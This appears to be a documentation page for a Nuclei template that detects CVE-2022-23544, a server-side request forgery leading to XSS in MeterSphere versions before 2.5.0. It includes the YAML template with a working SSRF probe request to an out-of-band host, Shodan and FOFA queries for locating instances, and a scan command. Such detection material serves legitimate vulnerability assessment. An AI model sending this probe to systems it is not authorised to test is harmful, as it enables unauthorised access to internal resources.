MeterSphere < 2.5.0 SSRF
ID: CVE-2022-23544
Severity: medium
Author: j4vaovo
Tags: cve2022,cve,metersphere,ssrf,oast,xss
Description
Section titled “Description”MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in IssueProxyResourceService::getMdImageByUrl allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere’s origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.
YAML Source
Section titled “YAML Source”id: CVE-2022-23544
info: name: MeterSphere < 2.5.0 SSRF author: j4vaovo severity: medium description: | MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds. impact: | An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade MeterSphere to version 2.5.0 or later to mitigate the SSRF vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23544 - https://nvd.nist.gov/vuln/detail/CVE-2022-23544 - https://github.com/metersphere/metersphere/security/advisories/GHSA-vrv6-cg45-rmjj - https://github.com/metersphere/metersphere/commit/d0f95b50737c941b29d507a4cc3545f2dc6ab121 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-23544 cwe-id: CWE-918,CWE-79 epss-score: 0.00094 epss-percentile: 0.3975 cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* metadata: verified: "true" max-request: 1 vendor: metersphere product: metersphere shodan-query: - html:"metersphere" - http.html:"metersphere" fofa-query: - title="MeterSphere" - body="metersphere" - title="metersphere" tags: cve2022,cve,metersphere,ssrf,oast,xss
http: - method: GET path: - "{{BaseURL}}/resource/md/get/url?url=http://oast.pro"
matchers-condition: and matchers: - type: word part: body words: - 'Interactsh Server'
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a004630440220088f02f1d5d63506b1b2d8297d413a764586d2041a3c5c36da28df9746a4304d0220269821afd89f1afa7ef519717caec5790b4abfc15e6ca68ae308a5231b7fba1c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-23544.yaml"